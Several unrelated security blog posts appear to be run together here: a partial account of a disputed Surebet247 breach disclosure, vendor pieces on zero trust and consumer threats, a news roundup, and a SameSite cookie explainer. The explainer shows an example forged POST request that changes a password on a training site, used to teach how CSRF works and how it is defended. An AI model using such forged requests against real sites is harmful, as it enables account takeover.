The Difficulty of Disclosure, Surebet247 and the Streisand Effect

A day passed. Two days passed. Nothing. These guys really want to do this the hard way, don't they?! Expecting them to go down kicking and screaming, I reached out to a handful of my HIBP subscribers who also appeared in the breach and asked them 3 simple questions:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

With 3M subscribers in my service, I've always got a good sample set that crosses over with any sizeable breach I come across and as such, I've always got candidates willing to help with breach verification. I fired off the emails and waited.

At the same time, instead of acquiescing to Surebet247's bullying tactics, Tefo upped the ante further by writing a second article after reaching out to Nigeria's National Information Technology Development Agency (NITDA) who had the following to say:

The Director-General, and CEO of NITDA, Mr. Kashifu Inuwa Abdullahi, gave an order for the incident to be investigated by NITDA's Data Breach Investigation Team.

This, of course, is precisely what we'd expect of a regulator and I'll be eagerly awaiting the outcome of that investigation. Speaking of eagerly awaiting, it didn't take long to get a response to my HIBP subscriber outreach emails with a reply promptly coming back from a gentleman named Stefan. Stefan confirmed that he'd used the Surebet247 service in the past and gave me his month of birth. It matched perfectly to the data in the alleged breach. I reverted with his day of birth and in turn, he confirmed it was accurate. Lastly, curious about his European name, I asked him which country he was from and he replied with a single word:

Germany.

Oh, now it's interesting! Once you start dealing with the personal information of EU data subjects it invokes the whole GDPR discussion, a fact that Tefo quickly jumped on and used as material for a third article about how Surebet247 is in violation of the European Union's GDPR.

I also asked another question in the original email I haven't touched on yet: "approximately when did you register"? In Stefan's initial response, he advised that "The first newsletter I found is from 13 feb 2014" (obviously Stefan likes to hold onto all his mail). However, this didn't line up with the data which suggested the registration date was "2016-09-19". I shared that data point with him and he came back with a really interesting explanation:

On 27 sep 2016 I got an email concerning "Migrations Challenges" (telling me that all balances are secure). So, maybe on 19 sep 2016 they migrated to another platform and "registered" everyone per that date?

Sure enough, further inspection of the data showed thousands of records all "registered" on that same day: 19 September 2016, a mere 8 days before the company sent an email about "Migration Challenges".

Another HIBP subscriber responded:

Yes, I know surebet247 service, a betting bookmaker based in my country Nigeria. I cannot recall the date I registered, but I know that it's earlier than 2019, my account there should be over 2 years old. My month of birth is October.

Surebet247 user? Check.

Registered more than 2 years ago? Check.

Born in October? Check.

Every single response I got from every single subscriber that replied to my request for support confirmed precisely the information contained in the "alleged" breach. Now, I ask you: what are the chances that someone sent me a trove of data with so many independently correlating points and yet "no customer data of ours was hacked or exposed", as Sheriff phrased it? If Surebet247 was to offer odds on the likelihood that they'd been breached, they'd be very short odds indeed!

So it's back to Twitter to DM them again, however...

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

And that's when I decided to write this blog post. 8 days after first attempting to alert them privately to a serious security incident that would not only impact their customers but also impact their own business interests, they decided that this was the most appropriate course of action:

Now remember, this is a company that handles other people's money! Granted, gambling merely amounts to a tax on people who can't do maths but regardless, you'd expect at least a vague attempt at professionalism. It wasn't just me that was blocked either, I was originally alerted to Surebet247's propensity to silence bearers of bad news by Tefo who'd just discovered he'd lost his primary channel of communication with them. It wasn't just us either, they were on a rampage to drown out other voices they didn't like too:

And now here we are, Streisand'd all over the place.

The Streisand effect is a phenomenon whereby an attempt to hide, remove, or censor a piece of information has the unintended consequence of publicizing the information more widely, usually facilitated by the Internet.

Because of Surebet247's attempts to censor discussion on this incident, they're getting more of it than ever with the press now starting to jump onto it well beyond Tefo's initial 3 stories:

Bad corporate behaviour like this is no longer something you simply sweep under the rug; it needs to be broadcast far and wide as a cautionary tale for the next organisation that elects to follow the same strategy. Per my earlier tweet about data breach grief, the outcome of this process is a foregone conclusion and assuming I haven't made a massive series of errors in the workings explained above, Surebet247 will ultimately come clean about the breach and take responsibility for their actions.

I'll leave you with a quote I've said many times now and it's more relevant in this situation than ever before:

We are now in an era where people are no longer judging organisations as harshly because they had a breach, but are judging them more on the way they handle it.

An Overview of Zero Trust Architecture, According to NIST

NIST recently released a draft publication, SP 800-207: Zero Trust Architecture (ZTA), an overview of a new approach to network security.

While ZTA is already present in many cybersecurity policies and programs that sought to restrict access to data and resources, this document is intended to both “abstractly define” ZTA and provide more guidance on deployment models, uses cases and roadmaps to implementation.

What’s the problem they’re trying to solve? Agencies and enterprise networks have given authorized users broad access to resources, since they’ve traditionally focused on perimeter defenses. But that’s led to lateral movement within the network – one of the biggest security challenges for federal agencies.

Realistically, NIST recognizes that the migration to a ZTA is more of a journey rather than a complete replacement of an enterprise’s infrastructure. Most enterprises will likely continue to operate in a hybrid model – of both zero trust + legacy mode – for awhile as they continue their IT modernization investments.

And despite the misleading name, they state that ZTA is not a single network architecture, but rather a set of guiding principles.

The overall design denotes:

  • A shift away from wide network perimeters to a narrower focus on protecting individual or small groups of resources
  • No implicit trust is granted to systems based on their physical or network location

While traditional methods block attacks coming from the internet, they may not be effective at detecting or blocking attacks originating from inside the network.

ZTA seeks to focus on the crux of the issue, which NIST defines as two main objectives:

  1. Eliminate unauthorized access to data and services
  2. Make the access control enforcement as granular as possible

Zero Trust Architecture Tenets

NIST lists out a few conceptual guidelines that the design and deployment of a ZTA should align with (summarized for brevity below):

  1. All data and computing services are considered resources. For example, an enterprise might classify personally-owned devices as resources, if they’re allowed to access enterprise resources.
  2. All communication is secure regardless of network location. This means access requests from within the network must meet the same security requirements as those from outside of it, and communication must be encrypted and authenticated.
  3. Access to individual enterprise resources is granted on a per-connection basis. The trust of whatever is requesting access is evaluated before granted access – authentication to one resource doesn’t automatically mean they get access to another resource.
  4. Access to resources is determined by policy, including the state of user identity and the requesting system, and may include other behavioral attributes. NIST defines ‘user identity’ as a network account used to request access, plus any enterprise-assigned attributes to that account. A ‘requesting system’ refers to device characteristics (software versions, network location, etc.). ‘Behavioral attributes’ include user & device analytics, any behavior deviations from baselined patterns.
  5. The enterprise ensures all owned and associated systems are in the most secure state possible, while monitoring systems to ensure they remain secure. Enterprises need to monitor the state of systems and apply patches or fixes as needed – any systems discovered to be vulnerable or non-enterprise owned may be denied access to enterprise resources.
  6. User authentication is dynamic and strictly enforced before access is allowed. NIST refers to this as a ‘constant cycle of access’ of threat assessment and continuous authentication, requiring user provisioning and authorization (the use of MFA for access to enterprise resources), as well as continuous monitoring and re-authentication throughout user interaction.

Zero Trust Architecture Threats

What follows is a summary of some of the key potential ZTA threats listed in the publication:

Insider Threat

To reduce the risk of an insider threat, a ZTA can:

  • Prevent a compromised account or system from accessing resources outside of how it’s intended
  • MFA for network access can reduce the risk of access from a compromised account
  • Prevent compromised accounts or systems from moving laterally through the network
  • Using context to detect any access activity outside of the norm and block account or system access

To prevent the threat of unauthorized access, Duo provides MFA for every application, as part of the Cisco Zero Trust framework. An additional layer of identity verification can help mitigate attacker access using stolen passwords or brute-force attacks. That paired with Duo’s device insight and policies provides a solid foundation for zero trust for the workforce.

Learn more about Duo’s new federal editions tailored to align with:

  • FedRAMP/FISMA security controls
  • NIST’s Digital Identity Guidelines (NIST SP 800-63-3)
  • FIPS 140-2 compliance

See more about FedRAMP authorized authentication, providing secure application access for federal agencies and other public sector customers, including role/location-based access policies, biometric authentication, and more.

Network Visibility

In a ZTA, all traffic should be inspected, logged and analyzed to identify and respond to network attacks against the enterprise. But some enterprise network traffic may be difficult to monitor, as it comes from third-party systems or applications that cannot be examined due to encrypted traffic.

In this situation, NIST recommends collecting encrypted traffic metadata and analyzing it to detect malware or attackers on the network. It also references Cisco’s research on machine learning techniques for encrypted traffic (section 5.4, page 22):

“The enterprise can collect metadata about the encrypted traffic and use that to detect possible malware communicating on the network or an active attacker. Machine learning techniques [Anderson] can be used to analyze traffic that cannot be decrypted and examined. Employing this type of machine learning would allow the enterprise to categorize traffic as valid or possibly malicious and subject to remediation.”

Cisco Encrypted Traffic Analytics (ETA) allows you to detect and mitigate network threats in encrypted traffic to gain deeper insight without decryption. It also allows you to quickly contain infected devices and uses, while securing your network. Paired with Cisco Stealthwatch, you can get real-time monitoring using machine learning and context-aware analysis.

Zero Trust Architecture: Continuous Monitoring

The publication also references having a strong Continuing Diagnostics and Mitigations (CDM) program as “key to the success of ZTA.”

This is a complete inventory of physical and virtual assets. In order to protect systems, agencies need insight into everything on their infrastructure:

  • What’s connected? The devices, applications and services used; as well as the security posture, vulnerabilities and threats associated.
  • Who’s using the network? The internal and external users, including any (non-person) entities acting autonomously, like service accounts that interact with resources.
  • What is happening on the network? Insight into the traffic patterns, messages and communication between systems.
  • How is data protected? Enterprise policies for how information is protected, both at rest and in transit.

Having visibility into the different areas of connectivity and access provides a baseline to start evaluating and responding to activity on and off the network.

Cisco Zero Trust

Asking the above discovery questions and finding a solution that can accurately and comprehensively answer them can be challenging, as it requires user, device, system and application telemetry that spans your entire IT environment – from the local corporate network to branches to the multi-cloud; encompassing all types of users from employees to vendors to contractors to remote workers, etc.

Get visibility into everything on your infrastructure, and get control over who can access what, on an ongoing basis. Cisco Zero Trust provides a comprehensive approach to securing all access across your applications and environment, from any user, device and location. It protects your workforce, workloads and workplace. 

It is comprised of a portfolio of the three following primary products:

  • To protect the workforce, Duo Security ensures that only the right users and secure devices can access applications.
  • To protect workloads, Tetration secures all connections within your apps, across multi-cloud.
  • To protect the workplace, SD-Access secures all user and device connections across your network, including IoT.

This complete zero-trust security model allows you to mitigate, detect and respond to risks across your environment. Verifying trust before granting access across your applications, devices and networks can help protect against identity-based and other access security risks.

Cisco was recently named a leader in The Forrester Wave™: Zero Trust eXtended Ecosystem Platform Providers, Q4 2019read the report to learn more about our market leadership in current zero-trust offerings and strategy.

The post An Overview of Zero Trust Architecture, According to NIST appeared first on Cisco Blogs.

The Everyday Cyber Threat Landscape: Trends from 2019 to 2020

The past 12 months have been another bumper year for cybercrime affecting everyday users of digital technology. Trend Micro blocked more than 26.8 billion of these threats in the first half of 2019 alone. The bad news is that there are many more out there waiting to steal your personal data for identity fraud, access your bank account, hold your computer to ransom, or extort you in other ways.

To help you stay safe over the coming year we’ve listed some of the biggest threats from 2019 and some trends to keep an eye on as we hit the new decade. As you’ll see, many of the most dangerous attacks will look a lot like the ones we warned about in 2019.

As we enter 2020 the same rules apply: stay alert, stay sceptical, and stay safe by staying protected.

Top five threats of 2019

Cybercrime is a chaotic, volatile world. So to make sense of the madness of the past 12 months, we’ve broken down the main type of threats consumers encountered into five key areas:

Home network threats: Our homes are increasingly powered by online technologies. Over two-thirds (69%) of US households now own at least one smart home device: everything from voice assistant-powered smart speakers to home security systems and connected baby monitors. But gaps in protection can expose them to hackers. As the gateway to our home networks, routers are particularly at risk. It’s a concern that 83% are vulnerable to attack. There were an estimated 105m smart home attacks in the first half of 2019 alone.

Endpoint threats: These are attacks aimed squarely at you the user, usually via the email channel. Trend Micro detected and blocked more than 26 billion such email threats in the first half of 2019, nearly 91% of the total number of cyber-threats. These included phishing attacks designed to trick you into clicking on a malicious link to steal your personal data and log-ins or begin a ransomware download. Or they could be designed to con you into handing over your personal details, by taking you to legit-looking but spoofed sites. Endpoint threats sometimes include social media phishing messages or even legitimate websites that have been booby-trapped with malware.

Mobile security threats: Hackers are also targeting our smartphones and tablets with greater gusto. Malware is often unwittingly downloaded by users, since it’s hidden in normal-looking Android apps, like the Agent Smith adware that infected over 25 million handsets globally this year. Users are also extra-exposed to social media attacks and those leveraging unsecured public Wi-Fi when using their devices. Once again, the end goal for the hackers is to make money: either by stealing your personal data and log-ins; flooding your screen with adverts; downloading ransomware; or forcing your device to contact expensive premium rate phone numbers that they own.

Online accounts under attack: Increasingly, hackers are after our log-ins: the virtual keys that unlock our digital lives. From Netflix to Uber, webmail to online banking, access to these accounts can be sold on the dark web or they can be raided for our personal identity data. Individual phishing attacks is one way to get these log-ins. But an increasingly popular method in 2019 was to use automated tools that try tens of thousands of previously breached log-ins to see if any of them work on your accounts. From November 2017 through the end of March 2019, over 55 billion such attacks were detected.

Breaches are everywhere: The raw materials needed to unlock your online accounts and help scammers commit identity fraud are stored by the organizations you interact with online. Unfortunately, these companies continued to be successfully targeted by data thieves in 2019. As of November 2019, there were over 1,200 recorded breaches in the US, exposing more than 163 million customer records. Even worse, hackers are now stealing card data direct from the websites you shop with as they are entered in, via “digital skimming” malware.

What to look out for in 2020

Smart homes under siege: As we invest more money in smart gadgets for our families, expect hackers to double down on network attacks. There’s a rich bounty for those that do: they can use an exposed smart endpoint as a means to sneak into your network and rifle through your personal data and online accounts. Or they could monitor your house via hacked security cameras to understand the best time to break in. Your hacked devices could even be recruited into botnets to help the bad guys attack others.

Social engineering online and by phone: Attacks that target user credulity are some of the most successful. Expect them to continue in 2020: both traditional phishing emails and a growing number of phone-based scams. Americans are bombarded by 200 million automated “robocalls” each day, 30% of which are potentially fraudulent. Sometimes phone fraud can shift quickly online; for example, tech support scams that convince the user there’s something wrong with their PC. Social engineering can also be used to extort money, such as in sextortion scams designed to persuade victims that the hacker has and is about to release a webcam image of them in a “compromising position.” Trend Micro detected a 319% increase in these attacks from 2H 2018 to the first half of 2019.

Threats on the move: Look out for more mobile threats in 2020. Many of these will come from unsecured public Wi-Fi which can let hackers eavesdrop on your web sessions and steal identity data and log-ins. Even public charging points can be loaded with malware, something LA County recently warned about. This comes on top of the escalating threat from malicious mobile apps.

All online accounts are fair game: Be warned that almost any online account you open and store personal data in today will be a target for hackers tomorrow. For 2020, this means of course you will need to be extra careful about online banking. But also watch out for attacks on gaming accounts.  Not only your personal identity data and log-ins but also lucrative in-game tokens will become highly sought after. Twelve billion of those recorded 55 billion credential stuffing attacks were directed at the gaming industry.

Worms make a comeback: Computer worms are dangerous because they self-replicate, allowing hackers to spread attacks without user interaction. This is what happened with the WannaCry ransomware attacks of 2017. A Microsoft flaw known as Bluekeep offers a new opportunity to cause havoc in 2020. There may be more out there.

How to stay safe

Given the sheer range of online threats facing computer users in 2020, you’ll need to cover all bases to keep your systems and data safe. That means:

Protecting the smart home with network monitoring solutions, regular checks for security updates on gadgets/router, changing the factory default logins to strong passwords, and putting all gadgets onto a guest network.

Tackling data-stealing malware, ransomware and other worm-style threats with strong AV from a reputable vendor, regular patching of your PC/mobile device, and strong password security (as given below).

Staying safe on the move by always using VPNs with public Wi-Fi, installing AV on your device, only frequenting official app stores, and ensuring you’re always on the latest device OS version. And steer clear of public USB charging points.

Keeping accounts secure by using a password manager for creating and storing strong passwords and/or switching on two-factor authentication where available. This will stop credential stuffing in its tracks and mitigate the impact of a third-party breach of your log-ins. Also, never log-in to webmail or other accounts on shared computers.

Taking on social engineering by never clicking on links or opening attachments in unsolicited emails, texts or social media messages and never giving out personal info over the phone.

How Trend Micro can help

Fortunately, Trend Micro fully understands the multiple sources for modern threats. It offers a comprehensive range of security products to protect all aspects of your digital life — from your smart home, home PCs, and mobile devices to online accounts including email and social networks, as well as when browsing the web itself.

Trend Micro Home Network Security: Provides protection against network intrusions, router hacks, web threats, dangerous file downloads and identity theft for every device connected to the home network.

Trend Micro Security: Protects your PCs and Macs against web threats, phishing, social network threats, data theft, online banking threats, digital skimmers, ransomware and other malware. Also guards against over-sharing on social media.

Trend Micro Mobile Security: Protects against malicious app downloads, ransomware, dangerous websites, and unsafe Wi-Fi networks.

Trend Micro Password Manager: Provides a secure place to store, manage and update your passwords. It remembers your log-ins, enabling you to create long, secure and unique credentials for each site/app you need to sign-in to.

Trend Micro WiFi Protection: Protects you on unsecured public WiFi by providing a virtual private network (VPN) that encrypts your traffic and ensures protection against man-in-the-middle (MITM) attacks.

Trend Micro ID Security (Android, iOS): Monitors underground cybercrime sites to securely check if your personal information is being traded by hackers on the Dark Web and sends you immediate alerts if so.

The post The Everyday Cyber Threat Landscape: Trends from 2019 to 2020 appeared first on .

This Week in Security News: Latest Cyber Risk Index Shows Elevated Risk of Cyber Attack and IoT Company Wyze Exposes Information of 2.4M Customers

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about Trend Micro’s Cyber Risk Index (CRI) and its results showing increased cyber risk. Also, read about a data breach from IoT company Wyze that exposed information of 2.4 million customers.

Read on:

The 5 New Year’s Tech Resolutions You Should Make for 2020

Now is the perfect time to reflect on the past and think of all the ways you can make this coming year your best one yet. With technology playing such a central role in our lives, technology resolutions should remain top of mind heading into the new year. In this blog, Trend Micro shares five tech resolutions that will help make your 2020 better and safer.

Security Study: Businesses Remain at Elevated Risk of Cyber Attack

Elevated risk of cyber attack is due to increased concerns over disruption or damages to critical infrastructure, according to the Trend Micro’s latest Cyber Risk Index (CRI) study. The company commissioned Ponemon Institute to survey more than 1,000 organizations in the U.S. to assess business risk based on their current security postures and perceived likelihood of attack.

Parental Controls – Trend Micro Home Network Security Has Got You Covered

In the second blog of a three-part series on security protection for your home and family, Trend Micro discusses the risks associated with children beginning to use the internet for the first time and how parental controls can help protect them.

Cambridge Analytica Scandal: Facebook Hit with $1.6 Million Fine

The Cambridge Analytica scandal continues to haunt Facebook. The company has been receiving fines for its blatant neglect and disregard towards users’ privacy. The latest to join the bandwagon after the US, Italy, and the UK is the Brazilian government.

Why Running a Privileged Container in Docker is a Bad Idea

Privileged containers in Docker are containers that have all the root capabilities of a host machine, allowing the ability to access resources which are not accessible in ordinary containers. In this blog post, Trend Micro explores how running a privileged, yet unsecure, container may allow cybercriminals to gain a backdoor in an organization’s system.

IoT Company Wyze Leaks Emails, Device Data of 2.4M

An exposed Elasticsearch database, owned by Internet of Things (IoT) company Wyze, was discovered leaking connected device information and emails of millions of customers. Exposed on Dec. 4 until it was secured on Dec. 26, the database contained customer emails along with camera nicknames, WiFi SSIDs (Service Set Identifiers; or the names of Wi-Fi networks), Wyze device information, and body metrics.

Looking into Attacks and Techniques Used Against WordPress Sites

WordPress is estimated to be used by 35% of all websites today, making it an ideal target for threat actors. In this blog, Trend Micro explores different kinds of attacks against WordPress – by way of payload examples observed in the wild – and how attacks have used hacked admin access and API, Alfa-Shell deployment, and SEO poisoning to take advantage of vulnerable sites.

FPGA Cards Can Be Abused for Faster and More Reliable Rowhammer Attacks

In a new research paper published on the last day of 2019, a team of American and German academics showed that field-programmable gate array (FPGA) cards can be abused to launch better and faster Rowhammer attacks. The new research expands on previous work into an attack vector known as Rowhammer, first detailed in 2014

Emotet Attack Causes Shutdown of Frankfurt’s IT Network

The city of Frankfurt, Germany, became the latest victim of Emotet after an infection forced it to close its IT network. There were also incidents that occurred in the German cities of Gießen, Bad Homburgas and Freiburg.

BeyondProd Lays Out Security Principles for Cloud-Native Applications

BeyondCorp was first to shift security away from the perimeter and onto individual users and devices. Now, it is BeyondProd that protects cloud-native applications that rely on microservices and communicate primarily over APIs, because firewalls are no longer sufficient. Greg Young, vice president of cybersecurity at Trend Micro, discusses BeyondProd’s value in this article.

How MITRE ATT&CK Assists in Threat Investigation

In 2013, the MITRE Corporation, a federally funded not-for-profit company that counts cybersecurity among its key focus area, came up with MITRE ATT&CK™, a curated knowledge base that tracks adversary behavior and tactics. In this analysis, Trend Micro investigates an incident involving the MyKings botnet to show how the MITRE ATT&CK framework helps with threat investigation.

TikTok Banned by U.S. Army Over China Security Concerns

With backlash swelling around TikTok’s relationship with China, the United States Army this week announced that U.S. soldiers can no longer have the social media app on government-owned phones. The United States Army had previously used TikTok as a recruiting tool for reaching younger users,

Mobile Money: How to Secure Banking Applications

Mobile banking applications that help users check account balances, transfer money, or pay bills are quickly becoming standard products provided by established financial institutions. However, as these applications gain ground in the banking landscape, cybercriminals are not far behind.

What security controls do you have in place to protect your home and family from risks associated with children who are new internet users? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Latest Cyber Risk Index Shows Elevated Risk of Cyber Attack and IoT Company Wyze Exposes Information of 2.4M Customers appeared first on .

Promiscuous Cookies and Their Impending Death via the SameSite Policy

Promiscuous Cookies and Their Impending Death via the SameSite Policy

Cookies like to get around. They have no scruples about where they go save for some basic constraints relating to the origin from which they were set. I mean have a think about it:

If a website sets a cookie then you click a link to another page on that same site, will the cookie be automatically sent with the request? Yes.

What if an attacker sends you a link to that same website in a malicious email and you click that link, will the cookie be sent? Also yes.

Last one: what if an attacker directs you to a malicious website and upon visiting it your browser makes a post request to the original website that set the cookie - will that cookie still be sent with the request? Yes!

Cookies just don't care about how the request was initiated nor from which origin, all they care about is that they're valid for the requested resource. "Origin" is a key word here too; those last two examples above are "cross-origin" requests in that they were initiated from origins other than the original website that set the cookie. Problem is, that opens up a rather nasty attack vector we know as Cross Site Request Forgery or CSRF. Way back in 2010 I was writing about this as part of the OWASP Top 10 for ASP.NET series and a near decade on, it's still a problem. Imagine this request:

POST https://hack-yourself-first.com/Account/ChangePassword
Cookie: AuthCookie=EF29...

NewPassword: passw0rd
ConfirmPassword: passw0rd

This is a real request from my Hack Yourself First website I use as part of the workshops Scott Helme and I run. You can go and create an account there then try to change the password and watch the request that's sent via your browser's dev tools. Then, ask yourself the question: what does the HTTP request need to look like in order to change the user's password? There are only 3 requirements:

  1. It needs to be a POST request
  2. It needs to be sent to the URL on the first line
  3. It needs to have 2 fields in the body called NewPassword and ConfirmPassword

That is all. It doesn't matter if the request is initiated from the website itself or from an external location, for example an attacker's website. If that malicious site can force the browser into making a POST request to that URL with that form data, the password is changed. Why is this possible? Because the auth cookie is sent with the request regardless of where it's initiated from and that, is how a CSRF attack works.

We (the industry) tackled this risk by applying copious amounts of sticky tape we refer to anti-forgery tokens. By way of example, here's what the request to perform a domain search for troyhunt.com on HIBP looks like:

POST https://haveibeenpwned.com/DomainSearch
.AspNet.ApplicationCookie=BjzGJ4...
__RequestVerificationToken=B0kTW2...

DomainName: troyhunt.com
__RequestVerificationToken: Llx764...

There are two anti-forgery tokens passed in the request, one in a cookie and one in the body, both called "__RequestVerificationToken". They're not identical but they're paired such that when the server receives the request it checks to see if both values exist and belong together. If not, the request is rejected. This works because whilst the one in the cookie will be automatically sent with the request regardless of its origin, in a forged request scenario the one in the body would need to be provided by the attacker and they have no idea what the value should be. The browser's security model ensures there's no way of the attacker causing the victim's browser to visit the target site, generate the token in the HTML then pull it out of the browser in a way the malicious actor can access. At least not without a cross site scripting vulnerability as well and then that's a whole different class of vulnerability with different defences.

This, frankly, is a mess. Whilst it's relatively easy to implement via frameworks such as ASP.NET, it leaves you wondering - do cookies really need to be that promiscuous? Do they need to accompany every single request regardless of the origin? No, they don't, which is why if you look in Chrome's dev tools on this very blog at the time of writing, you'll see the following:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

The "future release of Chrome" is version 80 and it's scheduled to land on the 4th of Feb which is rapidly approaching. Which brings us to the SameSite cookies mentioned in the console warning above. In a nutshell, they boil down to 3 different ways of handling cookies based on the value set:

  1. None: what Chrome defaults to today without a SameSite value set
  2. Lax: some limits on sending cookies on a cross-origin request
  3. Strict: tight limits on sending cookies on a cross-origin request

Come version 80, any cookie without a SameSite attribute will be treated as "Lax" by Chrome. This is really important to understand because put simply, it'll very likely break a bunch of stuff. In order to demonstrate that, I've set up a little demo site to show how "Lax" and "Strict" SameSite cookies behave alongside the traditional ones with no policy at all. I'm going to do this with an "origin" site (the one that sets the cookies in the first place) and an "external" site (one which links to or embeds content from the origin site). Let's begin by visiting the origin site at http://originsite.azurewebsites.net/setcookies/

Promiscuous Cookies and Their Impending Death via the SameSite Policy

That's intentionally loaded over the insecure scheme for reasons that will became apparent later. It sets a bunch of cookies which can then be read at http://originsite.azurewebsites.net/readcookies/

Promiscuous Cookies and Their Impending Death via the SameSite Policy

I'm showing the Chrome dev tools here as they make it easy to see the SameSite value that's been set for each cookie (if set at all). These have been given self-explanatory names so no need to delve into them here. The main thing is that the site setting the cookies can read them all. But that's not what SameSite is all about, let's make it interesting and load up http://externalsite.azurewebsites.net/

Promiscuous Cookies and Their Impending Death via the SameSite Policy

There are 4 different things I want to demonstrate here as each implements a slightly different behaviour. Let's begin with by clicking the GET request button:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

This loads the origin website with the GET verb and passes through all existing cookies except for the "Strict" one. Going back to the purpose of this blog post, once Chrome starts defaulting cookies without a SameSite policy to "Lax", GET requests will still send them through.

Next up, let's try the POST request:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

And this is where things start to get interesting as neither the "Strict" nor "Lax" cookies have been sent with the request. The default cookies with no SameSite policy has, but only because I'm running Chrome 79. Come next month when Chrome 80 hits, the image above will no longer show the default cookie. By extension, any websites you're responsible for that are passing cookies around cross domain by POST request and don't already have a SameSite policy are going to start misbehaving pretty quickly.

Next up is the iframe:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

You can see how the source of the frame is the origin website and embedding it like this will make a GET request, but even the "Lax" cookie hasn't been passed. This is really important to understand: not all resource types behave the same way even when the same verb is used.

The last one is the cookie image and it's easiest just to look at the request in the dev tools for this one:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

As with the iframe, it's only the cookies with no SameSite policy that are sent either because it's explicitly set to "None" or because no policy has been set at all. But as with the iframe and the POST request, the default cookie shortly won't be sent at all and again, that's where the gotcha is going to hit next month.

Now, there's two more nuance to all this, the first of which is detailed on Chrome's Platform Status page:

Chrome will make an exception for cookies set without a SameSite attribute less than 2 minutes ago. Such cookies will also be sent with non-idempotent (e.g. POST) top-level cross-site requests despite normal SameSite=Lax cookies requiring top-level cross-site requests to have a safe (e.g. GET) HTTP method. Support for this intervention ("Lax + POST") will be removed in the future.

Given that last sentence, it's probably not something you want to be relying on though.

The second nuance relates to cookies with a "None" policy that are served insecurely:

Deprecate and remove the use of cookies with the SameSite=None attribute but without the Secure attribute. Any cookie that requests SameSite=None but is not marked Secure will be rejected.

As a massive HTTPS proponent, this makes me happy 😊 To demonstrate this behaviour, I've added an additional "None" cookie but flagged it as secure. As such, the cookie will only stick after being loaded over an HTTPS connection so give this a go: https://originsite.azurewebsites.net/setcookies/

That results in the following cookies coming back in the response, the highlighted one being the new one:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

Now try loading the secure version of the external site at https://externalsite.azurewebsites.net/

Promiscuous Cookies and Their Impending Death via the SameSite Policy

Both the highlighted cookies will die as of Chrome 80: The "None" cookie because whilst it has a SameSite policy, it's not flagged as "Secure" and the default cookie because it will inherit the behaviour of a "Lax" cookie which will no longer be loaded into an iframe.

Want to try it all out? You can toggle these features in Chrome today by first changing the default behaviour for cookies without a SameSite policy at chrome://flags/#same-site-by-default-cookies

Promiscuous Cookies and Their Impending Death via the SameSite Policy

And then requiring that they be secure at chrome://flags/#cookies-without-same-site-must-be-secure

Promiscuous Cookies and Their Impending Death via the SameSite Policy

Now let's try loading that last page again:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

This change has the potential to break a lot of stuff so if you're in an environment where you're explicitly disabling the SameSite policy with "None" and still making insecure requests (*cough* enterprise), times are about to get interesting. Or if you're Google's own tracking service:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

This popped up on my blog as soon as I changed Chrome's default behaviour to reflect what's coming next month (it's subtly different to the one earlier in this blog post) so it's a good example of the sorts of things you can proactively pick up now. If you do see this sort of thing in the enterprise, Chrome's changed behaviour can also be reverted across the organisation:

Enterprise IT administrators may need to implement special policies to temporarily revert Chrome Browser to legacy behavior if some services such as single sign-on or internal applications are not ready for the February launch.

As an example of the sort of stuff this change impacts, Microsoft have said it breaks OpenIdConnect logins which is definitely something you want to be aware of in advance. If you're living in a Microsoft world, as of .NET 4.7.2 there's now a SameSite enum on cookies to help make configuring your apps a little easier:

Promiscuous Cookies and Their Impending Death via the SameSite Policy

(Quick note on Microsoft's implementation: their first shot at it was buggy and caused the "None" policy to omit the SameSite cookie attribute altogether which, as you're now aware, would cause issues come Chrome 80. It's since fixed in the latest framework releases but as of the time of writing, hasn't been pushed to the Azure App Service. I've just finished a rather frustrating debugging process which culminated in manually sending a "Set-Cookie" header to make the demo app behave as I wanted it to.)

This changed cookie behaviour looks like it's going to stick and extend well beyond just Chrome. There's an IETF draft for Incrementally Better Cookies specifying "Lax" by default and requiring "Secure" on all "None" cookies and Mozilla have an intent to implement the same behaviour in Firefox (note that back in May they were targeting V69 but as of V71 which is current today, it's not yet implemented).

So that's the SameSite cookie story. It's a good move by Chrome IMHO as it takes us towards a more "secure by default" position but as with many changes that favour security, it'll also break some stuff along the way. The fix is easy, all it needs is for everyone responsible for maintaining any system that uses cookies that might be passed from an external origin to understand what's going on. Can't be that hard, right? Hello? Oh...

Security resolutions for 2020 to stay safe online!

As we are about to enter the new year, it’s ritualistic to reflect on our experiences from the passing year and make resolutions for the New Year. Most people make resolutions around good heath, their life goals, etc. Here is a different angle to our routine resolutions’ list – Security…

The 3 W’s in Zero Trust Security

Picture this scenario: you are a security guard at an office building. Today you are looking after a restricted area. A person you’ve never seen before walks straight past you into one of the rooms. Would you stop them or would you just assume they are allowed to be there?

In a physical world, trust is most commonly based on who you are, not where you are. A savvy security guard would ask you for your ID before allowing you in. Virtually, though, the situation is different: being in the right place is often enough. If you are inside of a company’s network perimeter, it is often assumed you have the right to be there. You gain access to the same data and tools that any other trusted user would. It’s clear that such an approach is no longer enough.

Zero trust security comes in as an alternative model, more in line with the current threat landscape.  It is based on the principle of “always check, never trust“, originally introduced by Forrester. It takes into account 3 main factors:

  • Workforce: Employees are at risk of identity theft, which is one of the most widespread types of fraud today.
  • Workload: New vulnerabilities in applications and their improper management open highways for cybercriminals.
  • Workplace: With more and more connected devices, the workspace has extended far beyond the four walls of you company building.

Moving from a perimeter model to Zero Trust means assessing, adapting and implementing new security policies that address threats in a constantly changing environment. In this trust-centric approach access is granted to users and devices, not a network.

What's different in a Zero-Trust Approach

This means that policies now need to be calculated based on a vast number of data sources. All network activities must be continuously taken into account. Any indications of compromise or changes in the behaviour of apps, users and devices must be examined, validated and receive immediate responses.

How to apply a Zero Trust model

Cisco’s practical approach to Zero Trust includes six important steps.

  1. Establish levels of trust for users and user devices (identity verification with multi-factor authentication and device status, which must be compliant and properly updated)
  2. Establish levels of reliability for IoT and/or workloads (profile and baseline)
  3. Establish SD perimeters to control access to the application (authorised access)
